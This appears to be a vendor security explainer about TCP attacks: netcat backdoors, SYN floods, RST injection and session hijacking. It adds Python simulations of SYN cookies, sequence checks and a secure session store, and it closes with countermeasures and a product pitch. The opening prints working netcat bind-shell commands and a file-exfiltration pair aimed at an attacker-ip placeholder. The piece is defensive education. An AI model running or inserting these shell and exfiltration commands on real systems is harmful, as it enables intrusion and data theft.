You opened an email attachment (an .exe, or a .pdf with something embedded in it) and the code inside it ran. A few bad things can happen at that point, including a connection from your device out to the attacker's machine where their netcat is listening. With enough finesse, the hacker uses netcat to plant a backdoor on your system that they can come back to at any time.
For example, the hacker's code could do the following:
- Create a backdoor if your system is Linux (a bind shell: netcat listens on port 2222 and hands a bash shell to whoever connects):
nc -l -p 2222 -e /bin/bash
- Create a backdoor if your system is Windows (same idea; -e names the program to expose, normally cmd.exe for a command prompt, or a dropped binary such as the hack.exe used here):
nc -l -p 1337 -e hack.exe
Note that -e only exists in netcat builds compiled with the "GAPING_SECURITY_HOLE" option and in Nmap's ncat; the OpenBSD netcat shipped by many Linux distributions does not have it.
- Either command opens a listener on your system (say 192.168.1.35) and pipes the Windows command shell or the Linux bash shell to whoever connects. The hacker then connects from their own machine:
nc 192.168.1.35 2222
A reverse shell is the same trick in the other direction: the hacker's netcat listens and the code on your machine connects out to it, which is the variant that gets through a firewall that blocks inbound connections but allows outbound ones.
- To steal your file, the hacker sets up a listener on his computer that writes whatever arrives to disk. Netcat never takes a file name as an argument; it reads from and writes to standard input and output, so the file is attached with a shell redirect:
nc -v -w 20 -l -p 8888 > yourBankStatement.pdf
The code on your machine then pushes the file into that connection (<attacker-ip> is a placeholder for the hacker's address):
nc -w 3 <attacker-ip> 8888 < yourBankStatement.pdf
Heads up: the "Real-time protection" setting of Microsoft Defender in Windows Security typically detects nc.exe as a hacking tool and quarantines it, which stops both the bind-shell backdoor above and the reverse-shell variant before they run. Make sure your computer has it enabled.
The Transmission Control Protocol (TCP) represents a special genre of vulnerabilities in protocol design and implementation. The socket framework is as old as sliced bread, and security hardening has mostly come as an afterthought, wrapped around it like a coat of armor.
TCP attacks range from the SYN flood, the Reset (RST) attack and session hijacking to the reverse shell; SYN cookies are the kernel-side defense against the first of these. Let's make sense of why each of them needs a counter measure.
A TCP SYN flood exploits the TCP three-way handshake in an attempt to disrupt a service. The client sends a SYN, the server answers with a SYN-ACK and allocates state for the half-open connection, and the client is supposed to finish with an ACK. In a SYN flood the attacker sends SYNs at a high rate, usually from spoofed source addresses, and never sends the final ACK. The server keeps every half-open connection in its backlog until it times out, and once the backlog is full legitimate SYNs are dropped and the service becomes unresponsive. SYN cookies counter this by encoding the connection details in the server's initial sequence number instead of allocating state, so the server only commits memory once a valid ACK comes back.
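To make the resource asymmetry concrete, here is an added example (not code from the original page or from AES LLC): a Python simulation of a listener that keeps a half-open backlog beside one that uses SYN cookies, both flooded with SYNs from spoofed sources that never complete the handshake. The backlog size, the timeout and the cookie construction (an HMAC over source address, port and a minute counter, truncated to 32 bits) are simplifications chosen for illustration; real kernels also pack an MSS index and a timestamp into the cookie.

```python
import hashlib
import hmac
import secrets
from collections import OrderedDict

BACKLOG = 128             # assumed: max half-open (SYN_RECV) entries the server keeps
HALF_OPEN_TIMEOUT = 60.0  # assumed: seconds before an unanswered SYN_RECV entry is reaped
MOD32 = 1 << 32
SYN_COOKIE_SECRET = secrets.token_bytes(32)  # per-server secret, generated at start-up


class StatefulListener:
    """Classic listener: every SYN costs a backlog slot until the final ACK or a timeout."""

    def __init__(self):
        self.now = 0.0
        self.half_open = OrderedDict()   # (src_ip, src_port) -> (isn, time_created)
        self.dropped_syns = 0
        self.established = 0

    def tick(self, seconds):
        """Advance the clock and reap half-open entries that have timed out."""
        self.now += seconds
        stale = [k for k, (_, created) in self.half_open.items()
                 if self.now - created >= HALF_OPEN_TIMEOUT]
        for k in stale:
            del self.half_open[k]

    def on_syn(self, src_ip, src_port):
        if len(self.half_open) >= BACKLOG:   # backlog full: the SYN is silently dropped
            self.dropped_syns += 1
            return None
        isn = secrets.randbits(32)
        self.half_open[(src_ip, src_port)] = (isn, self.now)
        return isn                            # sent back in the SYN-ACK

    def on_ack(self, src_ip, src_port, ack):
        entry = self.half_open.pop((src_ip, src_port), None)
        if entry is None or (entry[0] + 1) % MOD32 != ack:
            return False
        self.established += 1
        return True


class SynCookieListener:
    """SYN-cookie listener: the ISN itself encodes the connection, so no SYN_RECV state is kept."""

    def __init__(self):
        self.now = 0.0
        self.established = 0

    def _cookie(self, src_ip, src_port, minute):
        msg = f"{src_ip}:{src_port}:{minute}".encode()
        mac = hmac.new(SYN_COOKIE_SECRET, msg, hashlib.sha256).digest()
        return int.from_bytes(mac[:4], "big")   # 32-bit ISN (simplified cookie layout)

    def tick(self, seconds):
        self.now += seconds

    def on_syn(self, src_ip, src_port):
        return self._cookie(src_ip, src_port, int(self.now // 60))   # nothing is stored

    def on_ack(self, src_ip, src_port, ack):
        minute = int(self.now // 60)
        for m in (minute, minute - 1):   # tolerate a minute boundary between SYN-ACK and ACK
            if (self._cookie(src_ip, src_port, m) + 1) % MOD32 == ack:
                self.established += 1
                return True
        return False


def spoofed_flood(listener, count=500):
    """Constructed attack traffic: SYNs from forged sources that never send the final ACK."""
    for i in range(count):
        src = f"10.{(i >> 16) & 255}.{(i >> 8) & 255}.{i & 255}"
        listener.on_syn(src, 40000 + (i % 20000))


def legit_connect(listener):
    """A real client completing the handshake; returns True if the server established it."""
    isn = listener.on_syn("192.168.1.35", 51000)
    if isn is None:
        return False
    return listener.on_ack("192.168.1.35", 51000, (isn + 1) % MOD32)


if __name__ == "__main__":
    stateful = StatefulListener()
    spoofed_flood(stateful)
    print("stateful server during flood:", legit_connect(stateful), "dropped:", stateful.dropped_syns)
    stateful.tick(HALF_OPEN_TIMEOUT)     # bogus entries time out, service recovers
    print("stateful server after timeout:", legit_connect(stateful))
    cookies = SynCookieListener()
    spoofed_flood(cookies)
    print("syn-cookie server during flood:", legit_connect(cookies))
```

The stateful server refuses the real client as soon as the backlog is full and only recovers when the bogus entries age out, while the cookie server never had anything to exhaust; that is the whole point of the defense, at the cost of not being able to store options such as window scaling for cookie-validated connections.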
An important aspect of TCP is that segments carry flags, one of which is Reset (RST). If a party on a TCP connection receives a segment with RST set from the other party, it immediately closes the connection. A hacker can disrupt a legitimate connection by injecting a forged RST segment, causing a denial of service. To be accepted, the forged segment has to match the connection's four-tuple (both addresses and both ports) and carry a sequence number the receiver considers acceptable: under the original RFC 793 rules anything inside the receive window, while hosts that implement RFC 5961 reset only on an exact match and answer an in-window but inexact RST with a challenge ACK, which makes blind, off-path injection far more expensive.
Session hijacking is the exploitation of a valid session, identified by a session key or session id, to gain unauthorized access to information or services on a computer system. At the web layer it is also known as cookie hijacking: steal or predict the session cookie and you are the user. At the TCP layer the hijacker first desynchronizes the client and server so that they can no longer exchange data (for example by cutting in on the path and redirecting packets to the hacker's machine), which lets him or her forge packets that both ends accept as genuine, mimicking the real traffic. The attacker thereby takes control of the session.
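The sequence-number check is what separates a cheap attack from an expensive one, both for the RST injection and for the forged data segments of TCP session hijacking described above (either must land inside the receiver's window). The following Python is an added example, not code from the original page: it implements the RFC 793 in-window test, the legacy and RFC 5961 RST handling built on it, and a blind off-path attacker who knows the four-tuple but not the sequence number and walks the 32-bit space one window width at a time. The window size and the receiver's expected sequence number are constructed values.

```python
MOD32 = 1 << 32


def in_window(seq, rcv_nxt, rcv_wnd):
    """RFC 793 acceptability test: is seq inside [rcv_nxt, rcv_nxt + rcv_wnd), modulo 2^32?"""
    return (seq - rcv_nxt) % MOD32 < rcv_wnd


def rst_action_legacy(seq, rcv_nxt, rcv_wnd):
    """Pre-RFC 5961 hosts: any in-window RST tears the connection down."""
    return "reset" if in_window(seq, rcv_nxt, rcv_wnd) else "drop"


def rst_action_rfc5961(seq, rcv_nxt, rcv_wnd):
    """RFC 5961 hosts: only an exact match resets; an in-window but inexact RST draws a
    challenge ACK, which the genuine peer answers with a correct RST and an attacker cannot."""
    if seq == rcv_nxt:
        return "reset"
    if in_window(seq, rcv_nxt, rcv_wnd):
        return "challenge-ack"
    return "drop"


def blind_rst_attack(rcv_nxt, rcv_wnd, decide, step=None):
    """Off-path attacker who knows the four-tuple but not the sequence number: forge RSTs
    across the 32-bit space, one window width apart by default, until one is accepted.
    Returns the number of forged segments it took, or None if the whole space was tried."""
    step = step or rcv_wnd
    attempts = 0
    for seq in range(0, MOD32, step):
        attempts += 1
        if decide(seq, rcv_nxt, rcv_wnd) == "reset":
            return attempts
    return None


if __name__ == "__main__":
    rcv_nxt, rcv_wnd = 0x12345678, 65535   # constructed receiver state
    print("legacy host, window-stepped guesses:",
          blind_rst_attack(rcv_nxt, rcv_wnd, rst_action_legacy))
    print("RFC 5961 host, window-stepped guesses:",
          blind_rst_attack(rcv_nxt, rcv_wnd, rst_action_rfc5961))
    print("RFC 5961 worst case (exact match):", MOD32, "guesses")
```

Against the legacy rule the attacker needs on the order of 2^32 / window guesses, a few thousand packets with a 64 KB window, which is why RST attacks on long-lived sessions such as BGP peerings were practical; against RFC 5961 the window-stepped search never succeeds and the exact-match search needs up to 2^32 packets per connection.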
Counter Measures:
- Obviously, do not click on suspicious attachments.
- If the session id carries structure (user, timestamp), encrypt or MAC it under a server-side key so it cannot be predicted or tampered with.
- Send the session id only over TLS (SSL) and mark the cookie Secure and HttpOnly.
- Use switches rather than hubs, so an attacker on the LAN cannot simply listen to everyone's traffic.
- Run protection software on both the server and the client.
- Use an IDS to detect ARP spoofing/poisoning, the usual way a LAN attacker puts himself in the path.
- Use long random numbers (at least 128 bits from a cryptographic generator) for the session id.
- Expire sessions: invalidate the id on logout and after an idle and an absolute timeout.
- Rotate the session id rather than keeping one id for the whole visit; at a minimum regenerate it on login and on any change of privilege.
- Check the web application for errors that leak session ids (in URLs, logs, referrers or error pages).
- IPsec is a valid defense mechanism, since an off-path attacker cannot forge authenticated segments.
- Use secure protocols instead of clear-text protocols such as HTTP, FTP, Telnet and rlogin.
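Several of the session-id items above come down to how the server mints, stores and expires ids. The following Python is an added example, not code from the original page: a minimal server-side session store that uses a cryptographic random id, enforces idle and absolute timeouts, regenerates the id on demand and builds a Set-Cookie header with the Secure, HttpOnly and SameSite attributes, beside a predictable id derivation of the kind to avoid. The timeout values and cookie name are assumptions.

```python
import hashlib
import secrets
import time

SESSION_BYTES = 32            # 256 bits of entropy: guessing is infeasible
IDLE_TIMEOUT = 15 * 60        # assumed: seconds of inactivity before a session dies
ABSOLUTE_TIMEOUT = 8 * 3600   # assumed: hard cap on session lifetime
COOKIE_NAME = "sid"           # assumed cookie name


def weak_session_id(user_id, counter):
    """What NOT to do: derived from guessable inputs, so an attacker who knows one id
    (or just the user name and roughly how many logins there were) can compute the next."""
    return hashlib.md5(f"{user_id}-{counter}".encode()).hexdigest()


class SessionStore:
    """Server-side store: the cookie only carries an opaque random handle."""

    def __init__(self, clock=time.time):
        self.clock = clock                 # injectable for testing
        self._sessions = {}                # sid -> {"user", "created", "last_seen"}

    def _mint(self, user, now):
        sid = secrets.token_urlsafe(SESSION_BYTES)   # CSPRNG, never random.random() or a counter
        self._sessions[sid] = {"user": user, "created": now, "last_seen": now}
        return sid

    def create(self, user):
        return self._mint(user, self.clock())

    def lookup(self, sid):
        """Return the user for a live session, or None; expired sessions are purged on sight."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        now = self.clock()
        if now - s["last_seen"] > IDLE_TIMEOUT or now - s["created"] > ABSOLUTE_TIMEOUT:
            del self._sessions[sid]
            return None
        s["last_seen"] = now
        return s["user"]

    def regenerate(self, old_sid):
        """Issue a fresh id for the same user (after login or a privilege change) and
        retire the old one, so an id captured before login is worthless afterwards."""
        s = self._sessions.pop(old_sid, None)
        if s is None:
            return None
        return self._mint(s["user"], self.clock())

    def logout(self, sid):
        return self._sessions.pop(sid, None) is not None


def set_cookie_header(sid, max_age=IDLE_TIMEOUT):
    """Secure: TLS only. HttpOnly: no script access. SameSite: not sent cross-site."""
    return (f"Set-Cookie: {COOKIE_NAME}={sid}; Secure; HttpOnly; SameSite=Strict; "
            f"Path=/; Max-Age={max_age}")


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create("alice")
    print(set_cookie_header(sid))
    print("user:", store.lookup(sid))
    new_sid = store.regenerate(sid)
    print("old id still valid?", store.lookup(sid) is not None)
    print("weak id for alice, login #2:", weak_session_id("alice", 2))
```

Because the store is server-side, revoking a session is a dictionary delete, and logging out really ends it; a self-contained signed token cannot be revoked without a blacklist, which is one reason to keep an opaque id unless statelessness is a hard requirement.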
How do you know you have been hacked?
Unfortunately, TCP hack incidents can go unnoticed for a long time. AES LLC has you covered with our enterprise analysis toolkit: CleverView for CTrace and CleverView for TCPIP.